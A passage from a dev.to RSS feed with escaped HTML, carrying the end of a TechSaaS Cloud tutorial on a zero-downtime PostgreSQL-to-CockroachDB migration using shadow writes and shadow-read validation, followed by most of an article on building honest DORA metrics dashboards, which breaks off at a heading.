      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/database-migration-zero-downtime-shadow-writes" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/database-migration-zero-downtime-shadow-writes?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=database-migration-zero-downtime-shadow-writes" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;h1&gt;
  
  
  Zero-Downtime Database Migration: Shadow Writes, Dual-Read, and the 12-Second Cutover
&lt;/h1&gt;

&lt;p&gt;Database migrations are the scariest infrastructure change you can make. Your data is the one thing you absolutely cannot lose, corrupt, or make unavailable.&lt;/p&gt;

&lt;p&gt;We migrated a 2TB PostgreSQL database to CockroachDB for a SaaS client with zero downtime, zero data loss, and a cutover that took 12 seconds. Here's the complete playbook.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Not Just pg_dump and Restore?
&lt;/h2&gt;

&lt;p&gt;For a 2TB database, pg_dump takes roughly 4-8 hours depending on your hardware. During that time, your application is either down or writing data that won't be in the dump. You'd need a maintenance window, and for a SaaS product with global users, "maintenance windows" mean lost revenue and broken SLAs.&lt;/p&gt;

&lt;p&gt;The shadow-write approach eliminates the maintenance window entirely.&lt;/p&gt;

&lt;h2&gt;
  
  
  Phase 1: Dual-Write Setup
&lt;/h2&gt;

&lt;p&gt;The core idea: write every mutation to BOTH the old database (Postgres) and the new database (CockroachDB) simultaneously.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;DualWriteMiddleware&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;primary_db&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;shadow_db&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;primary&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;primary_db&lt;/span&gt;    &lt;span class="c1"&gt;# Postgres (source of truth)
&lt;/span&gt;        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;shadow&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;shadow_db&lt;/span&gt;      &lt;span class="c1"&gt;# CockroachDB (catching up)
&lt;/span&gt;
    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;execute_write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;query&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="c1"&gt;# Primary write — this is the source of truth
&lt;/span&gt;        &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;primary&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;execute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;query&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Shadow write — async, failures logged but don't affect user
&lt;/span&gt;        &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="n"&gt;asyncio&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;wait_for&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
                &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;shadow&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;execute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;query&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                &lt;span class="n"&gt;timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;5.0&lt;/span&gt;
            &lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;warning&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Shadow write failed: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;shadow_failure_queue&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;append&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;query&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Key rules:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Primary database (Postgres) is always the source of truth&lt;/li&gt;
&lt;li&gt;Shadow writes are fire-and-forget — failures are logged and retried, never shown to users&lt;/li&gt;
&lt;li&gt;A failure queue captures any shadow writes that fail, for replay later&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Duration:&lt;/strong&gt; We ran dual-write for 2 weeks before moving to Phase 2.&lt;/p&gt;

&lt;h2&gt;
  
  
  Phase 2: Historical Data Migration
&lt;/h2&gt;

&lt;p&gt;While dual-writes handle new data, you need to backfill historical data. We used a chunked migration approach:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Migrate in 10,000-row chunks with checkpointing&lt;/span&gt;
python migrate.py &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--source&lt;/span&gt; postgres://prod-primary:5432/app &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--target&lt;/span&gt; cockroach://cockroach-cluster:26257/app &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--table&lt;/span&gt; orders &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--chunk-size&lt;/span&gt; 10000 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--checkpoint-file&lt;/span&gt; /tmp/migration-orders.checkpoint
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The checkpoint file tracks the last migrated primary key, so you can restart the migration without re-processing. For a 2TB database, this took about 18 hours running at low priority (to avoid impacting production reads).&lt;/p&gt;

&lt;h2&gt;
  
  
  Phase 3: Shadow-Read Validation
&lt;/h2&gt;

&lt;p&gt;This is where most migration guides stop, and where most migrations fail. Before cutting over reads, you need to validate that CockroachDB returns the same results as Postgres.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;ShadowReadValidator&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;validate_read&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;query&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="c1"&gt;# Read from both
&lt;/span&gt;        &lt;span class="n"&gt;primary_result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;primary&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;execute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;query&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;shadow_result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;shadow&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;execute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;query&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;params&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Compare
&lt;/span&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;primary_result&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;shadow_result&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;error&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;READ MISMATCH: query=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;query&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;error&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  Postgres: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;primary_result&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="si"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;error&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  CockroachDB: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;shadow_result&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="si"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;mismatch_counter&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;inc&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="c1"&gt;# Always return primary result
&lt;/span&gt;        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;primary_result&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We ran shadow-read validation on 10% of production read traffic for one week. Results:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;47 query incompatibilities found&lt;/strong&gt; (mostly around timestamp precision and JSON operator differences)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;3 data mismatches&lt;/strong&gt; (all from shadow-write failures that hadn't been replayed yet)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;0 correctness bugs&lt;/strong&gt; in CockroachDB itself&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each incompatibility was fixed by updating the application query or adding a compatibility layer. This validation phase is the most valuable part of the entire migration — it catches problems before they affect users.&lt;/p&gt;

&lt;h2&gt;
  
  
  Phase 4: Traffic Shifting
&lt;/h2&gt;

&lt;p&gt;Once shadow-reads show zero mismatches for 48 hours, gradually shift read traffic:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Feature flag configuration&lt;/span&gt;
&lt;span class="na"&gt;database_read_routing&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;cockroach_percentage&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;5&lt;/span&gt;     &lt;span class="c1"&gt;# Start at 5%&lt;/span&gt;
  &lt;span class="na"&gt;escalation_schedule&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;after&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;24h → 20%&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;after&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;24h → 50%&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;after&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;24h → 80%&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;after&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;24h → 100%&lt;/span&gt;
  &lt;span class="na"&gt;rollback_trigger&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;error_rate_threshold&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;0.1%&lt;/span&gt;
    &lt;span class="na"&gt;latency_p99_threshold&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;500ms&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;At each stage, monitor:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Error rates (should be identical or better)&lt;/li&gt;
&lt;li&gt;Latency p50/p95/p99 (CockroachDB was 15% faster for our read patterns)&lt;/li&gt;
&lt;li&gt;Data consistency (shadow-read mismatches should stay at 0)&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Phase 5: The 12-Second Cutover
&lt;/h2&gt;

&lt;p&gt;Once 100% of reads are going to CockroachDB successfully:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Stop dual-writes (Postgres stops receiving new data)&lt;/li&gt;
&lt;li&gt;Drain any remaining shadow-write failure queue&lt;/li&gt;
&lt;li&gt;Final consistency check (compare row counts, checksums on critical tables)&lt;/li&gt;
&lt;li&gt;Update connection strings to point to CockroachDB&lt;/li&gt;
&lt;li&gt;Restart application pools&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Steps 1-5 took 12 seconds in our case. The application experienced zero errors during cutover because reads were already going to CockroachDB.&lt;/p&gt;

&lt;h2&gt;
  
  
  Post-Migration
&lt;/h2&gt;

&lt;p&gt;Keep Postgres running in read-only mode for 30 days as a safety net. If anything goes wrong, you can revert by switching connection strings back. After 30 days with no issues, decommission the Postgres instance.&lt;/p&gt;

&lt;h2&gt;
  
  
  Lessons Learned
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Shadow-read validation catches 95% of migration bugs.&lt;/strong&gt; Don't skip it.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The failure queue is critical.&lt;/strong&gt; Without it, your shadow database will have data gaps.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Run dual-write for at least 2 weeks.&lt;/strong&gt; One week isn't enough to catch all edge cases.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Monitor CockroachDB performance during the migration.&lt;/strong&gt; Backfilling 2TB while handling dual-writes is a significant load.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Test rollback before you need it.&lt;/strong&gt; We practiced the rollback procedure three times before the actual migration.&lt;/li&gt;
&lt;/ol&gt;




&lt;p&gt;Planning a database migration? We've done zero-downtime migrations for databases from 100GB to 5TB. &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;Book a consultation&lt;/a&gt; or explore our &lt;a href="https://techsaas.cloud/services" rel="noopener noreferrer"&gt;infrastructure services&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>DORA Metrics: A Platform Engineering Dashboard</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Wed, 06 May 2026 19:07:10 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/dora-metrics-a-platform-engineering-dashboard-16ma</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/dora-metrics-a-platform-engineering-dashboard-16ma</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/dora-metrics-platform-engineering-dashboard" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;







&lt;p&gt;title: "DORA Metrics for Platform Engineering: What Your Dashboard Should Actually Measure"&lt;br&gt;
slug: dora-metrics-platform-engineering-dashboard&lt;br&gt;
category: Platform Engineering&lt;br&gt;
tags: [DORA Metrics, Platform Engineering, Developer Productivity, DevOps, SRE]&lt;br&gt;
seo_title: "DORA Metrics Guide 2026: Platform Engineering Dashboard That Works"&lt;br&gt;
meta_description: "Why most DORA metrics dashboards are misleading and how to build one that actually drives improvement. Covers deployment frequency, lead time, MTTR, and change failure rate with Grafana examples."&lt;/p&gt;
&lt;h2&gt;
  
  
  estimated_read_time: 10
&lt;/h2&gt;
&lt;h1&gt;
  
  
  DORA Metrics for Platform Engineering: What Your Dashboard Should Actually Measure
&lt;/h1&gt;

&lt;p&gt;Every platform engineering team has a DORA metrics dashboard. Most of them are lying.&lt;/p&gt;

&lt;p&gt;Deployment frequency of 47/day looks great until you realize 40 of those are config changes to a feature flag service. Lead time of 2 hours looks fast until you realize it's measuring time from merge to deploy, not time from first commit to production.&lt;/p&gt;

&lt;p&gt;Here's how to build a DORA dashboard that actually tells you something useful.&lt;/p&gt;
&lt;h2&gt;
  
  
  The Four Metrics (And What They Actually Mean)
&lt;/h2&gt;
&lt;h3&gt;
  
  
  1. Deployment Frequency
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What people measure:&lt;/strong&gt; &lt;code&gt;COUNT(deployments) / time&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;What you should measure:&lt;/strong&gt; &lt;code&gt;COUNT(meaningful_deployments) / time&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;A meaningful deployment changes user-facing behavior. Config changes, dependency bumps, and CI fixes don't count.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Bad: counts everything
sum(increase(deployments_total[24h]))

# Better: filter by deployment type
sum(increase(deployments_total{type="feature"}[24h]))
+ sum(increase(deployments_total{type="bugfix"}[24h]))
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2. Lead Time for Changes
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What people measure:&lt;/strong&gt; Merge to deploy&lt;br&gt;
&lt;strong&gt;What you should measure:&lt;/strong&gt; First commit to production traffic&lt;/p&gt;

&lt;p&gt;The time from a developer's first commit to when real users hit the new code. This captures code review wait time, CI queue time, staging validation, and rollout duration — all the friction your platform creates.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Capture the full pipeline
histogram_quantile(0.50,
  sum(rate(lead_time_seconds_bucket{
    stage="first_commit_to_production"
  }[7d])) by (le)
)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3. Change Failure Rate
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What people measure:&lt;/strong&gt; &lt;code&gt;failed_deploys / total_deploys&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;What you should measure:&lt;/strong&gt; &lt;code&gt;deploys_causing_degradation / total_deploys&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;A deployment that fails CI and never reaches production isn't a change failure — it's CI working correctly. A deployment that passes everything but causes a 10% error rate spike IS a change failure.&lt;/p&gt;
&lt;h3&gt;
  
  
  4. Mean Time to Recovery (MTTR)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What people measure:&lt;/strong&gt; Time from alert to resolution&lt;br&gt;
&lt;strong&gt;What you should measure:&lt;/strong&gt; Time from user impact to user recovery&lt;/p&gt;

&lt;p&gt;If your alerting has 15 minutes of lag, your MTTR looks 15 minutes better than reality. Measure from the moment error rates spike, not from when PagerDuty fires.&lt;/p&gt;
&lt;h2&gt;
  
  
  The Dashboard That Works
&lt;/h2&gt;
&lt;h3&gt;
  
  
  Panel 1: Weekly Deployment Velocity
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Line chart: deployments per week, split by type (feature, bugfix, infra)&lt;/li&gt;
&lt;li&gt;Exclude: config changes, dependency updates, CI fixes&lt;/li&gt;
&lt;li&gt;Annotation: mark release freezes, incidents, holidays&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  Panel 2: Lead Time Distribution
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Heatmap: lead time buckets (hours) over past 30 days&lt;/li&gt;
&lt;li&gt;Show p50, p75, p95 — not just average&lt;/li&gt;
&lt;li&gt;Split by team if multi-team org&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  Panel 3: Change Failure Rate Trend
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Stacked bar: successful deploys vs. failure-causing deploys per week&lt;/li&gt;
&lt;li&gt;Overlay: change failure rate as percentage line&lt;/li&gt;
&lt;li&gt;Alert threshold at 15% (DORA "high" performer benchmark)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  Panel 4: MTTR by Severity
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Bar chart: average MTTR split by incident severity (SEV1-4)&lt;/li&gt;
&lt;li&gt;Include: detection time, triage time, fix time, verification time&lt;/li&gt;
&lt;li&gt;Goal lines: SEV1 &amp;lt; 1hr, SEV2 &amp;lt; 4hr, SEV3 &amp;lt; 24hr&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  Panel 5: Platform Health Score
&lt;/h3&gt;

&lt;p&gt;Composite metric combining all four DORA metrics into a single score:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;score&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="nf"&gt;normalize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;deployment_freq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;target&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;daily&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mf"&gt;0.25&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt;
  &lt;span class="nf"&gt;normalize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;lead_time_hours&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;target&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;24&lt;/span&gt;&lt;span class="n"&gt;h&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mf"&gt;0.25&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt;
  &lt;span class="nf"&gt;normalize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;change_failure_rate&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;target&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0.85&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mf"&gt;0.25&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt;
  &lt;span class="nf"&gt;normalize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;mttr_hours&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;target&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="n"&gt;h&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mf"&gt;0.25&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Common Anti-Patterns
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. Gaming the Metrics
&lt;/h3&gt;

&lt;p&gt;Teams split PRs into tiny changes to inflate deployment frequency. Fix: measure feature completion rate alongside deployment frequency.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Measuring Teams Against Each Other
&lt;/h3&gt;

&lt;p&gt;DORA metrics are for teams to improve themselves, not for management to rank teams. Different services have legitimately different deployment profiles.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Ignoring Context
&lt;/h3&gt;

&lt;p&gt;A team with 0 deployments during a security incident investigation isn't underperforming — they're doing the right thing. Always annotate metric dashboards with context.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Snapshot Obsession
&lt;/h3&gt;

&lt;p&gt;Looking at this week's numbers in isolation tells you nothing. The trend over 3-6 months is what matters.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implementation: Data Sources for Real DORA
&lt;/h2&gt;

